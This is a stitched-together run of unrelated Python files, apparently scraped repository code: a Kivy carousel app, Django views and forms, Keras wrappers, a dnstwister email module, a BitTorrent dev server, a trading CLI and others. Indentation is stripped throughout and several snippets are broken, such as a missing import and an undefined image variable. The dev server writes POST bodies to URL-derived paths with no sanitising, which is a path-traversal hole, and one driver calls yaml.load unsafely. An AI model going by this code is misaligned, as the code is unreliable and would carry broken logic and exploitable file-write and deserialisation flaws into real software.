# a = [random.sample(1,34) for i in range(6)]
# print(a)
# a =[i for i in range(1,34)]
# b = random.sample([i for i in range(1,34)],6)
# print(type(b))
# d = random.randint(1,16)
# print(d)
# e = b.append(d)
# print(e)
# c =random.sample([i for i in range(1,34)],6).append(random.randint(1,16))
# print(c)
a = random.uniform(1,2)
print(a)
#
|
__author__ = 'Leandru'
from kivy.app import App
from kivy.core.audio import SoundLoader
from kivy.uix.label import Label
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.popup import Popup
from kivy.uix.image import Image
from kivy.uix.button import Button
from kivy.uix.carousel import Carousel
from kivy.uix.switch import Switch
from kivy.uix.slider import Slider
import sys
class CustomLayout(FloatLayout):
def __init__(self, **kwargs):
# suprascrierea initului vechi din modul
super(CustomLayout, self).__init__(**kwargs)
# var muzica_activa este o definita in acest namespace pt a avea efect in dezactivarea_volumului
self.muzica_activa =0
# obiectul layout0 este de tipul FloatLayout()
self.layout0 = FloatLayout()
# setam atributul source al obiect imag1
self.imag1 = Image(source="fundal.jpg")
# adaugam fundalul ca si widget
self.add_widget(self.imag1)
# setam atributele layout0
self.layout0.size = (600,500)
self.layout0.size_hint = (None,None)
self.layout0.padding = 200
self.imag1.add_widget(self.layout0)
# incarcam widgetul SoundLoader si atributele sale
self.sound = SoundLoader.load('And_So_YouCode Rap_Tarzi.wav')
self.sound.play()
self.sound.loop = True
self.sound.volume=0.5
# anulam functionalitatile cu care vine metoda
self.Menu(None)
def Menu(self, Buton):
# am curatat layoutul
self.layout0.clear_widgets()
# creare but1 si atributelor sale
self.but1 =Button(text = "Carusel",bold =True, background_color = (0,0,1,1))
self.but1.pos = (300,380)
self.but1.size_hint = (0.3,0.1)
self.but1.opacity = 0.7
#adaugarea ca si widget a but1 pe layout0
self.layout0.add_widget(self.but1)
# creare but2 si atributelor sale
self.but2 =Button(text = "Optiuni",bold =True, background_color = (0,0,1,1))
self.but2.pos = (300,300)
self.but2.size_hint = (0.3,0.1)
self.but2.opacity = 0.7
self.layout0.add_widget(self.but2)
# creare but3 si atributelor sale
self.but3 =Button(text = "About",bold =True, background_color = (0,0,1,1))
self.but3.pos = (300,220)
self.but3.size_hint = (0.3,0.1)
self.but3.opacity = 0.7
self.layout0.add_widget(self.but3)
# creare but4 si atributelor sale
self.but4 =Button(text = "Iesi",bold =True, background_color = (0,0,1,1))
self.but4.pos = (300,140)
self.but4.size_hint = (0.3,0.1)
self.but4.opacity = 0.7
self.layout0.add_widget(self.but4)
# se leaga evenimentele de apasare a butoanelor de metodele de mai jos
self.but1.bind(on_press = self.CatreCarusel)
self.but2.bind(on_press = self.Optiuni)
self.but3.bind(on_press = self.About)
self.but4.bind(on_press = self.Iesi)
def CatreCarusel(self, Buton):
# am curatat layoutul
self.layout0.clear_widgets()
# am adaptat programul din clasa folosind obiecte dar nu merge
# setam directia in care vom misca cu mouse-ul imaginile
self.carousel = Carousel(direction='right')
# setam viteza de miscare
self.carousel.anim_move_duration = 1
self.carousel.loop = True
self.carousel.size_hint = (0.7,0.7)
self.carousel.pos = (200,120)
self.carousel.add_widget(self.layout0)
self.image1 = Image(source="nature1.jpg")
self.carousel.add_widget(self.image1)
self.image2 = Image(source="nature2.jpg")
self.carousel.add_widget(self.image2)
self.image3 = Image(source="nature3.jpg")
self.carousel.add_widget(self.image3)
self.image1 = Image(source="nature4.jpg")
self.carousel.add_widget(self.image4)
self.eticheta_final = Label(text = "Am ajuns la finalul listei!", font_size = 30)
self.carousel.add_widget(self.eticheta_final)
# cream widgetul inapoiButon
self.inapoiButon = Button(text = "Inapoi",bold =True, background_color = (0,0,1,1))
self.inapoiButon.pos = (200,100)
self.inapoiButon.size_hint = (0.7,0.1)
self.inapoiButon.opacity = 0.7
self.layout0.add_widget(self.inapoiButon)
#legam apasarea butonului de intoarcerea la meniul principal
self.inapoiButon.bind(on_press = self.Menu)
def Optiuni(self, Buton):
self.layout0.clear_widgets()
# Cream un widget Switch si atributele sale
self.switch1 = Switch(text="muzica")
self.switch1.active = True
self.switch1.size_hint = (0.3,0.2)
self.switch1.pos = (300,360)
self.layout0.add_widget(self.switch1)
# leaga Switch-ul de metoda dezactiveaza_volum
self.switch1.bind(active=self.dezactiveaza_volum)
# cream un widget Label si atributele sale
# textul de pe acesta urmand sa se schimbe odata cu volumul
self.arata_volum = Label (text = "volum: 50")
self.arata_volum.size_hint = (0.3,0.1)
self.arata_volum.pos = (300,260)
self.layout0.add_widget(self.arata_volum)
# cream un widget Slider si atributele sale
# nu am urmat exact indicatiile din cerinta pt. a crea atributele
# am incercercat sa fac fereastra sa semene cu poza
self.slide_muzica = Slider(min=0, max=100, value=50)
self.slide_muzica.step = 5
self.slide_muzica.pos = (300,100)
self.slide_muzica.size_hint = (0.3,0.5)
self.slide_muzica.orientation="horizontal"
self.layout0.add_widget(self.slide_muzica)
# leaga Slider-ul de metoda valoare_volum
self.slide_muzica.bind(value=self.valoare_volum)
# crearea widgetu-lui inapoiButon si atributelor sale
self.inapoiButon = Button(text = "Inapoi",bold =True, background_color = (0,0,1,1))
self.inapoiButon.pos = (300,120)
self.inapoiButon.size_hint = (0.3,0.1)
self.inapoiButon.opacity = 0.7
self.layout0.add_widget(self.inapoiButon)
# legam apasarea butonului de intoarcerea la meniul principal
self.inapoiButon.bind(on_press=self.Menu)
def Iesi(self, Buton):
# Apelam sys.exit()
sys.exit()
def valoare_volum(self, x, y):
# modificam Labelul arata_volum aratand valoarea integer a slide-ului
self.arata_volum.text = "volum: " + str(int(self.slide_muzica.value))
self.sound.volume = self.slide_muzica.value/100
def dezactiveaza_volum(self, x, y):
if (self.muzica_activa %2 == 0) :
# slide-ul este dezactivat
self.slide_muzica.disabled =True
# stocam valoarea slidu-lui intr-o var temporara
self.slide_muzica.value_temp = int(self.slide_muzica.value)
# setam valorea volumului la 0
self.slide_muzica.value = 0
else:
# facem slide-ul iar available
self.slide_muzica.disabled =False
# reluam volumul melodiei din variabila temporara
self.slide_muzica.value = int(self.slide_muzica.value_temp)
self.sound.play()
# folosim aceasta variabila pt. a contoriza switch-ul
self.muzica_activa += 1
def About(self, Buton):
# crearea widgetu-lui inchide si atributelor sale
self.inchide = Button(text = "Inapoi", background_color = (0,0,1,1))
self.inchide.pos = (300,120)
self.inchide.size_hint = (1,0.1)
# legam apasarea butonului de intoarcerea la meniul principal
self.inchide.bind(on_press=self.inchide_popup)
# cream Label
self.eticheta = Label(text = "Multumiri InfoAcademy", bold = True, font_size = 24)
self.layout1 = BoxLayout()
self.layout1.orientation = "vertical"
self.layout1.padding = 40
self.layout1.add_widget(self.eticheta)
self.layout1.add_widget(self.inchide)
self.popup = Popup()
self.popup.background="fundal4_tema.jpg"
self.popup.size_hint = (None,None)
self.popup.size = (400, 400)
self.popup.title='Cine a creat aplicatia?'
self.popup.content = self.layout1
self.popup.open()
def inchide_popup(self, Buton):
self.popup.dismiss()
class CarouselApp(App):
def build(self):
self.icon ="python1.ico"
return CustomLayout()
if __name__ == '__main__':
CarouselApp().run()
|
#! /usr/bin/python
"""
Driver program for L1-mock.
"""
import argparse
import sys
import logging
import yaml
from ch_L1mock import manager
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
main_parser = argparse.ArgumentParser(
description="Run the CHIME FRB L1 processing mock-up.",
)
main_parser.add_argument("config_file",
type=str,
metavar="config.yaml",
help="Configuration file in YAML format. See examples.",
)
def main(p):
args = p.parse_args()
with open(args.config_file) as f:
m = manager.Manager(yaml.load(f))
m.run()
if __name__ == "__main__":
main(main_parser)
|
"""Email pages."""
import operator
import flask
from dnstwister import app, emailer, repository, stats_store
import dnstwister.tools as tools
import dnstwister.tools.email as email_tools
from dnstwister.configuration import features
ERRORS = (
'Email address is required',
)
def raise_not_found_if_not_flagged_on():
"""Return a 404 if not feature-flagged on."""
if not features.enable_emails():
flask.abort(404)
@app.route('/email/subscribe/<hexdomain>')
@app.route('/email/subscribe/<hexdomain>/<error>')
def email_subscribe_get_email(hexdomain, error=None):
"""Handle subscriptions."""
raise_not_found_if_not_flagged_on()
domain = tools.parse_domain(hexdomain)
if domain is None:
flask.abort(400, 'Malformed domain or domain not represented in hexadecimal format.')
# Attempt to parse out a validation error.
error_str = None
try:
if error is not None:
error_idx = int(error)
if error_idx >= 0:
error_str = ERRORS[error_idx]
except:
app.logger.info(
'Invalid error index {}'.format(error)
)
return flask.render_template(
'www/email/subscribe.html',
domain=domain,
hexdomain=hexdomain,
error=error_str,
hide_noisy=flask.request.args.get('hide_noisy') == 'True'
)
@app.route('/email/pending_verify/<hexdomain>', methods=['POST'])
def email_subscribe_pending_confirm(hexdomain):
"""Send a confirmation email for a user."""
raise_not_found_if_not_flagged_on()
domain = tools.parse_domain(hexdomain)
if domain is None:
flask.abort(400, 'Malformed domain or domain not represented in hexadecimal format.')
hide_noisy = bool(flask.request.form.get('hide_noisy'))
email_address = flask.request.form['email_address']
if email_address.strip() == '':
return flask.redirect('/email/subscribe/{}/0?hide_noisy={}'.format(
hexdomain,
hide_noisy
))
verify_code = tools.random_id()
verify_url = flask.request.url_root + 'email/verify/{}'.format(verify_code)
email_body = email_tools.render_email(
'confirm.html',
domain=domain,
verify_url=verify_url
)
repository.propose_subscription(
verify_code,
email_address,
domain,
hide_noisy
)
emailer.send(
email_address, 'Please verify your subscription', email_body
)
return flask.render_template('www/email/pending_verify.html', domain=domain)
@app.route('/email/verify/<verify_code>')
def email_subscribe_confirm_email(verify_code):
"""Handle email verification."""
pending_verify = repository.get_proposition(verify_code)
if pending_verify is None:
app.logger.info(
'Failed to verify a non-existent subscription with id: {}'.format(verify_code)
)
return flask.redirect('/')
email_address = pending_verify['email_address']
domain = pending_verify['domain']
hide_noisy = bool(pending_verify['hide_noisy'])
sub_id = tools.random_id()
repository.subscribe_email(sub_id, email_address, domain, hide_noisy)
repository.remove_proposition(verify_code)
return flask.render_template('www/email/subscribed.html', domain=domain)
@app.route('/email/unsubscribe/<sub_id>')
def unsubscribe_user(sub_id):
"""Unsubscribe a user from a domain."""
repository.unsubscribe(sub_id)
return flask.render_template('www/email/unsubscribed.html')
@app.route('/email/<sub_id>/noisy')
def email_view_noisy_domains(sub_id):
"""Show the noisy domains not sent in the email.
This is deliberately bound to the email system as the detection of noisy
domains is limited to the domains found in email subscriptions.
"""
subscribed_domain = repository.subscribed_domain(sub_id)
if subscribed_domain is None:
app.logger.info(
'Failed to retrieve sub for id for noisy report: {}'.format(sub_id)
)
return flask.redirect('/')
fuzzy_domains = map(
operator.itemgetter('domain-name'),
tools.fuzzy_domains(subscribed_domain)
)
noisy_domains = [domain
for domain
in fuzzy_domains
if stats_store.is_noisy(domain)]
return flask.render_template(
'www/email/noisy.html',
domain=subscribed_domain,
noisy_domains=noisy_domains
)
|
# Create your views here.
# -*- coding: utf-8 -*-
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template.context import RequestContext
import adb,os
import settings
#处理url里的creat
def index(request):
print 'in Chane'
#return HttpResponse('test index')
data = {}
data['text'] = 'test dffds df'
try:
img_path = os.path.join(settings.STATIC_ROOT,'img')
file_name = os.path.join(img_path,'temp.png')
print 'file_name:',file_name
adb.adb_snap(filename=file_name)
except:
print 'error in adb snap'
img_url = '/static/img/temp.png'
data['img'] = img_url
return render_to_response('adb.html',data)
def ajax_getxy(request):
print 'in ajax_getxy'
#print request.GET
adb_type = int(request.GET['type'])
x1 = int(request.GET['x1'])
y1 = int(request.GET['y1'])
x2 = int(request.GET['x2'])
y2 = int(request.GET['y2'])
x = (x1+x2)/2
y = (y1+y2)/2
#左起点
click_point=(x,y)
swipe_points = (x1,y,x2,y)
if adb_type==1:
print 'click point ',click_point
try:
import adb
adb.adb_touch(x,y)
#print dir(adb)
except:
HttpResponse('error in click point'+str(click_point))
elif adb_type==2:
import adb
swipe_points = (x1,y,x2,y)
adb.adb_swipe(x1,y,x2,y)
print 'swipe' ,swipe_points
elif adb_type==3:
swipe_points = (x2,y,x1,y)
import adb
adb.adb_swipe(x2,y,x1,y)
print 'swipe' ,swipe_points
return HttpResponse('OK') |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 19/8/6 下午4:01
# @Author : liaozz
# @File : forms.py
"""
自我介绍一下
"""
from django import forms
from captcha.fields import CaptchaField
class UserForm(forms.Form):
captcha = CaptchaField(label='验证码')
username = forms.CharField(label="用户名", max_length=128, widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': "Username", 'autofocus': ''}))
password = forms.CharField(label="密码", max_length=256,
widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Password"}))
class UserRegForm(forms.Form):
captcha = CaptchaField(label='验证码')
username = forms.CharField(label="用户名", max_length=128, widget=forms.TextInput(
attrs={'class': 'form-control', 'placeholder': "Username", 'autofocus': ''}))
password = forms.CharField(label="密码", max_length=256,
widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Password"}))
password2 = forms.CharField(label="验证密码", max_length=256,
widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Password"}))
reg_code = forms.CharField(label="注册码", max_length=256,
widget=forms.PasswordInput(attrs={'class': 'form-control', 'placeholder': "Code"})) |
import os
import csv
import sys
from PySide.QtGui import *
from PySide.QtCore import *
from ui_EventList import Ui_EventList
from EventWindow import EventWindow
if sys.version_info >= (3,0):
from builtins import str as text
else:
def text( data ):
return unicode( data )
class EventListWindow(QDialog, Ui_EventList):
def __init__(self, parent):
super(EventListWindow, self).__init__(parent)
self.rent = parent
self.setupUi(self)
self.assignWidgets()
self.csvList = []
def updateGUI( self ):
self.eventTree.setSortingEnabled(False)
self.eventTree.clear()
del self.csvList[:]
self.csvList.append(["ID","Place","Type","Players","Format","Location","Date","Deck","Wins","Losses","Draws"])
for eventId in self.rent.filteredEventData:
eventItem = TreeWidgetItem(self.eventTree)
eventItem.setText(0, eventId)
eventItem.setText(1, text(self.rent.eventData[eventId]["Place"]))
eventItem.setText(2, text(self.rent.eventData[eventId]["Type"]))
eventItem.setText(3, text(self.rent.eventData[eventId]["Players"]))
eventItem.setText(4, text(self.rent.eventData[eventId]["Format"]))
eventItem.setText(5, text(self.rent.eventData[eventId]["Location"]))
eventItem.setText(6, text(self.rent.eventData[eventId]["Date"]))
eventItem.setText(7, text(self.rent.eventData[eventId]["Deck"]))
eventItem.setText(8, text(self.rent.eventData[eventId]["Wins"]))
eventItem.setText(9, text(self.rent.eventData[eventId]["Losses"]))
eventItem.setText(10, text(self.rent.eventData[eventId]["Draws"]))
self.eventTree.addTopLevelItem(eventItem)
self.csvList.append([eventId, self.rent.eventData[eventId]["Place"], self.rent.eventData[eventId]["Type"],
self.rent.eventData[eventId]["Players"], self.rent.eventData[eventId]["Format"],
self.rent.eventData[eventId]["Location"], self.rent.eventData[eventId]["Date"],
self.rent.eventData[eventId]["Deck"], self.rent.eventData[eventId]["Wins"],
self.rent.eventData[eventId]["Losses"], self.rent.eventData[eventId]["Draws"]])
self.eventTree.setSortingEnabled(True)
for i in range(11):
self.eventTree.resizeColumnToContents(i)
def cancelPressed( self ):
self.hide()
def eventSelected( self, ourEvent, ourColumn ):
eventId = ourEvent.text(0)
if not self.rent.eventData[eventId]["WindowObject"]:
self.rent.eventData[eventId]["WindowObject"] = EventWindow( self.rent, eventId )
self.rent.eventData[eventId]["WindowObject"].show()
def exportStatsPressed( self ):
filename = QFileDialog.getSaveFileName(self, 'Selection a location to save your data to:', os.getenv('HOME'), 'CSV Files (*.csv)') #returns (fileName, selectedFilter)
if filename[0]:
with open(filename[0], "wb") as f:
writer = csv.writer(f)
writer.writerows(self.csvList)
self.rent.messageBox( "Data exported successfully." )
def assignWidgets( self ):
self.adjustFiltersButton.clicked.connect(lambda: self.rent.filtersWindow.show())
self.cancelButton.clicked.connect(self.cancelPressed)
self.exportStatsButton.clicked.connect(self.exportStatsPressed)
self.eventTree.itemDoubleClicked.connect(self.eventSelected)
#Custom object to allow sorting by number and alpha
class TreeWidgetItem( QTreeWidgetItem ):
def __init__(self, parent=None):
QTreeWidgetItem.__init__(self, parent)
def __lt__(self, otherItem):
column = self.treeWidget().sortColumn()
try:
return float( self.text(column) ) > float( otherItem.text(column) )
except ValueError:
return self.text(column) > otherItem.text(column)
|
# kkeras.py
import numpy as np
#np.random.seed(1337) # for reproducibility
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation
from keras.layers import Convolution1D, Flatten
from keras.optimizers import RMSprop #,SGD, Adam,
from keras.utils import np_utils
from keras import callbacks
from keras.regularizers import l2
import kutil
class MLPC():
"""
Multi layer perceptron classification
Define multi layer perceptron using Keras
"""
def __init__(self, l = [49, 30, 10, 3]):
"""
modeling is performed in self.modeling()
instead of direct performing in this function.
"""
model = self.modeling( l = l)
model.compile(loss='categorical_crossentropy',
optimizer=RMSprop(),
metrics=['accuracy'])
self.model = model
def modeling(self, l = [49, 30, 10, 3]):
"""
generate model
"""
model = Sequential()
model.add(Dense( l[1], input_shape=(l[0],)))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense( l[2]))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense( l[3]))
model.add(Activation('softmax'))
return model
def X_reshape( self, X_train_2D, X_val_2D = None):
"""
Used for child classes such as convolutional networks
When the number of arguments is only one,
only one values will be returned.
"""
if X_val_2D is None:
return X_train_2D
else:
return X_train_2D, X_val_2D
def fit( self, X_train, y_train, X_val, y_val, nb_classes = None, batch_size=10, nb_epoch=20, verbose = 0):
model = self.model
if nb_classes is None:
nb_classes = max( set( y_train)) + 1
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_val = np_utils.to_categorical(y_val, nb_classes)
model.reset_states()
earlyStopping=callbacks.EarlyStopping(monitor='val_loss', patience=3, verbose=verbose, mode='auto')
X_train, X_val = self.X_reshape( X_train, X_val)
history = model.fit(X_train, Y_train,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, validation_data=(X_val, Y_val), callbacks=[earlyStopping])
self.nb_classes = nb_classes
self.history = history
def score( self, X_test, y_test):
model = self.model
nb_classes = self.nb_classes
Y_test = np_utils.to_categorical(y_test, nb_classes)
X_test = self.X_reshape( X_test)
score = model.evaluate(X_test, Y_test, verbose=0)
return score[1]
class CNNC( MLPC):
def __init__(self, n_cv_flt = 2, n_cv_ln = 3, cv_activation = 'relu', l = [49, 30, 10, 3]):
"""
Convolutional neural networks
"""
self.n_cv_flt = n_cv_flt
self.n_cv_ln = n_cv_ln
self.cv_activation = cv_activation
super().__init__( l = l)
def modeling(self, l = [49, 30, 10, 3]):
"""
generate model
"""
n_cv_flt, n_cv_ln = self.n_cv_flt, self.n_cv_ln
cv_activation = self.cv_activation
model = Sequential()
# Direct: input_shape should be (l,0) not (l)
# if l, it assume a scalar for an input feature.
#model.add(Dense( l[1], input_shape=(l[0],)))
# Convolution
print( "n_cv_flt, n_cv_ln, cv_activation", n_cv_flt, n_cv_ln, cv_activation)
model.add(Convolution1D( n_cv_flt, n_cv_ln, activation=cv_activation, border_mode='same', input_shape=(l[0], 1)))
model.add(Flatten())
model.add(Dense( l[1]))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense( l[2]))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense( l[3]))
model.add(Activation('softmax'))
return model
def X_reshape( self, X_train_2D, X_val_2D = None):
"""
1D convolution and 2D convolution ordering different
1D: -1,1 (e.g., 50,1 and 50,3 for BK, RGB), input_shape = (50,1) or (50,3)
2D: 1,n,m (e.g., 1,128,128 and 3,128,128 for BK, RGB), input_shape = (1,128,128) or (3,128,128)
"""
X_train_3D = X_train_2D.reshape(X_train_2D.shape[0], -1, 1)
if X_val_2D is None:
return X_train_3D
else:
X_val_3D = X_val_2D.reshape(X_val_2D.shape[0], -1, 1)
return X_train_3D, X_val_3D
class CNNC_Name( CNNC):
def modeling(self, l = [49, 30, 10, 3]):
"""
generate model
"""
self.c_name = 'conv'
n_cv_flt, n_cv_ln = self.n_cv_flt, self.n_cv_ln
cv_activation = self.cv_activation
model = Sequential()
# Direct: input_shape should be (l,0) not (l)
# if l, it assume a scalar for an input feature.
#model.add(Dense( l[1], input_shape=(l[0],)))
# Convolution
print( "n_cv_flt, n_cv_ln, cv_activation", n_cv_flt, n_cv_ln, cv_activation)
#model.add(Convolution1D( n_cv_flt, n_cv_ln, activation=cv_activation,
# border_mode='same', input_shape=(1, l[0]), name = 'conv'))
model.add(Convolution1D( n_cv_flt, n_cv_ln, activation=cv_activation,
border_mode='same', input_shape=(l[0],1), name = self.c_name))
model.add(Flatten())
model.add(Dense( l[1]))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense( l[2]))
model.add(Activation('relu'))
model.add(Dropout(0.2))
model.add(Dense( l[3]))
model.add(Activation('softmax'))
self.layer_dict = dict([(layer.name, layer) for layer in model.layers])
return model
def get_layer( self, name):
return self.layer_dict[ name]
def self_c_wb( self):
self.c_w, self.c_b = self.get_layer( self.c_name).get_weights()
return self
def get_c_wb( self):
self.self_c_wb()
return self.c_w, self.c_b
class MLPR(): # Regression
"""
Multi layer perceptron regression
Define multi layer perceptron using Keras
"""
def __init__(self, l = [49, 30, 10, 1]):
"""
modeling is performed in self.modeling()
instead of direct performing in this function.
"""
model = self.modeling( l = l)
#model.compile(loss='categorical_crossentropy',
# optimizer=RMSprop(),
# metrics=['accuracy'])
model.compile(loss='mean_squared_error', optimizer='adam') #, metrics=['accuracy'])
self.model = model
def modeling(self, l = [2121, 100, 50, 10, 1]):
"""
generate model
"""
model = Sequential()
model.add(Dense( l[1], input_shape=(l[0],)))
model.add(Activation('relu'))
#model.add(Dropout(0.4))
model.add(Dense( l[2]))
model.add(Activation('relu'))
#model.add(Dropout(0.2))
model.add(Dense( l[3]))
model.add(Activation('relu'))
model.add(Dense( l[4]))
return model
def X_reshape( self, X_train_2D, X_val_2D = None):
"""
Used for child classes such as convolutional networks
When the number of arguments is only one,
only one values will be returned.
"""
if X_val_2D is None:
return X_train_2D
else:
return X_train_2D, X_val_2D
def fit( self, X_train, Y_train, X_val, Y_val, batch_size=10, nb_epoch=20, verbose = 0):
model = self.model
#if nb_classes is None:
# nb_classes = max( set( y_train)) + 1
#Y_train = np_utils.to_categorical(y_train, nb_classes)
#Y_val = np_utils.to_categorical(y_val, nb_classes)
model.reset_states()
earlyStopping=callbacks.EarlyStopping(monitor='val_loss', patience=3, verbose=verbose, mode='auto')
X_train, X_val = self.X_reshape( X_train, X_val)
history = model.fit(X_train, Y_train,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, validation_data=(X_val, Y_val), callbacks=[earlyStopping])
#self.nb_classes = nb_classes
self.history = history
def score( self, X_test, Y_test, batch_size=32, verbose=0):
model = self.model
X_test = self.X_reshape( X_test)
Y_test_pred = model.predict(X_test, batch_size=batch_size, verbose=verbose)
return kutil.regress_show4( Y_test, Y_test_pred)
def predict( self, X_new, batch_size=32, verbose=0):
model = self.model
#nb_classes = self.nb_classes
#Y_test = np_utils.to_categorical(y_test, nb_classes)
X_new = self.X_reshape(X_new)
y_new = model.predict(X_new, batch_size=batch_size, verbose=verbose)
return y_new
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser,PermissionsMixin,BaseUserManager
from django.conf import settings
from django.utils.text import Truncator
class UserProfileManager(BaseUserManager):
"""Manager for uswer profiles"""
def _create_user(self,email,name,password,**extra_fields):
"""Create and save a user with a given name,email,password"""
if not email :
raise ValueError("User must provide an email")
email=self.normalize_email(email)
user=self.model(email=email,name=name,**extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_user(self,email,name,password,**extra_fields):
"""Create a new user profile"""
extra_fields.setdefault("is_staff",False)
extra_fields.setdefault("is_superuser",False)
return self._create_user(email,name,password,**extra_fields)
def create_superuser(self,email,name,password,**extra_fields):
"""Create a new superuser"""
extra_fields.setdefault("is_staff",True)
extra_fields.setdefault("is_superuser",True)
user=self._create_user(email,name,password,**extra_fields)
if extra_fields.get("is_staff") is not True:
raise ValueError("Superuser must have is_staff=True")
if extra_fields.get("is_superuser") is not True:
raise ValueError("Superuser must have is_superuser=True")
return user
class UserProfile(AbstractBaseUser,PermissionsMixin):
"""Database model for users in the system """
email=models.EmailField(max_length=255,unique=True)
name=models.CharField(max_length=255)
is_active=models.BooleanField(default=True)
is_staff=models.BooleanField(default=False)
objects=UserProfileManager()
USERNAME_FIELD="email"
REQUIRED_FIELDS=["name"]
def __str__(self):
""""Retrieve string representation of the user"""
return self.email
def get_full_name(self):
"""Retrieve full name of user"""
return self.name
def get_short_name(self):
"""Retrieve short name of the user"""
return self.name
class Tweet(models.Model):
"""Database Model for user's tweets"""
author=models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE)
message=models.TextField(max_length=4000)
created_at=models.DateTimeField(auto_now_add=True)
updated_at=models.DateTimeField(auto_now=True)
def __str__(self):
"""Returns a string representation of the Comment Model"""
truncated_message=Truncator(self.message)
return truncated_message.chars(30)
class Comment(models.Model):
tweet=models.ForeignKey(Tweet,on_delete=models.CASCADE,null=True)
comment=models.TextField(max_length=400)
created_at=models.DateTimeField(auto_now_add=True)
updated_at=models.DateTimeField(auto_now=True)
author=models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
def __str__(self):
"""Returns a string representation of the Comment Model"""
truncated_message=Truncator(self.comment)
return truncated_message.chars(30)
#
|
#
# Copyright (c) 2010 BitTorrent Inc.
#
import BaseHTTPServer
import logging
import SimpleHTTPServer
import os
import urllib
import apps.command.base
class GriffinRequests(SimpleHTTPServer.SimpleHTTPRequestHandler):
def address_string(self):
# Non-localhost calls get timeouts in getfqdn
# (why does a "Basic" http server do this?)
return self.client_address[0]
def translate_path(self, path):
# Firefox on windows (for some reason) sends /asdf\asdf instead of
# /asdf/asdf
path = urllib.unquote(path).replace('\\', '/')
return SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(
self, path)
def send_head(self):
# Special version of send_head that falls back to the build directory.
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in "index.html", "index.htm":
# XXX - Modification
if self.path == '/':
path = os.path.join(path, 'build')
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
# Always read in binary mode. Opening files in text mode may cause
# newline translations, making the actual size of the content
# transmitted *less* than the content-length!
f = open(path, 'rb')
except IOError:
# XXX - Modification, don't send the error here.
return None
self.send_response(200)
self.send_header("Content-type", ctype)
fs = os.fstat(f.fileno())
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified", self.date_time_string(fs.st_mtime))
self.end_headers()
return f
def do_GET(self):
f = self.send_head()
if not f:
self.path = '/build' + self.path
f = self.send_head()
if not f:
self.send_error(404, 'File not found')
if f:
self.copyfile(f, self.wfile)
f.close()
def do_POST(self):
fp = open(os.path.join('test', self.path[1:]), 'wb')
fp.write(self.rfile.read(int(self.headers['Content-Length'])))
fp.close()
self.send_response(200)
class serve(apps.command.base.Command):
help = 'Run a development server to debug the project.'
user_options = [ ('port=', 'p', 'Port to listen on.', None) ]
option_defaults = { 'port': '8080' }
pre_commands = [ 'generate' ]
def run(self):
logging.info('\tstarting server, access it at http://localhost:%s' % (
self.options['port'],))
httpd = BaseHTTPServer.HTTPServer(
('', int(self.options['port'])), GriffinRequests)
httpd.serve_forever()
|
import model
import view
# TODO update print statements for trader menu 3 + 7
def main_menu():
"""main menu for account creation/login"""
while True:
print()
view.welcome()
print()
view.main_menu_options()
try:
mm_choice = int(view.menu_input())
except ValueError:
view.bad_input()
continue
if mm_choice not in (1, 2, 3):
view.bad_input()
# new user
elif mm_choice == 1:
# returns username, first name, last name, account_id, pass_hash, balance
try:
create_inputs = view.new_account_inputs()
except ValueError:
view.balance_needs_float()
continue
account = model.Account(create_inputs)
account.set_hashed_password(account.pass_hash)
account.save()
# login
elif mm_choice == 2:
# returns a tuple of username, password
login_inputs = view.login_inputs()
account = model.Account(username=login_inputs[0], password=login_inputs[1])
if account:
return account
view.bad_credentials()
else:
break
def trader_menu(account):
"""menu for options available post-login"""
while True:
print()
view.trader_menu()
try:
trader_input = int(view.menu_input())
except ValueError:
view.bad_input()
continue
if trader_input not in range(1,9):
view.bad_input()
# check balance
elif trader_input == 1:
view.account_balance(account.balance)
# deposit money
elif trader_input == 2:
try:
deposit_amount = float(view.deposit_input())
except ValueError:
view.bad_input()
continue
account.balance += deposit_amount
account.save()
# check positions
elif trader_input == 3:
view.print_positions(account.get_positions())
# lookup price
elif trader_input == 4:
try:
ticker_symbol = view.ticker_input()
stock_price = model.lookup_price(ticker_symbol)
view.print_lookup_price(stock_price)
except ValueError:
view.bad_stock_input()
# buy order
elif trader_input == 5:
buy_ticker_symbol = view.ticker_input()
try:
buy_quantity = int(view.buy_amount())
except:
view.bad_input()
continue
try:
account.buy(buy_ticker_symbol, buy_quantity)
except ValueError:
view.bad_buy()
# sell order
elif trader_input == 6:
sell_ticker_symbol = view.ticker_input()
try:
sell_quantity = int(view.sell_amount())
except:
view.bad_input()
continue
try:
account.sell(sell_ticker_symbol, sell_quantity)
except ValueError:
view.bad_sell()
# order history
elif trader_input == 7:
view.trade_history(account.get_trades())
# log out
elif trader_input == 8:
break
if __name__ == "__main__":
while True:
results = main_menu()
if not results:
break
trader_menu(results) |
"""Statistics Tool for Answerable
This file contains the functions used to analyze user answers.
"""
#
# TAG RELATED METRICS (USING QA)
#
_tags_info = None
def tags_info(qa):
"""Map each tag to its score, acceptance and count"""
global _tags_info
if _tags_info is not None:
return _tags_info
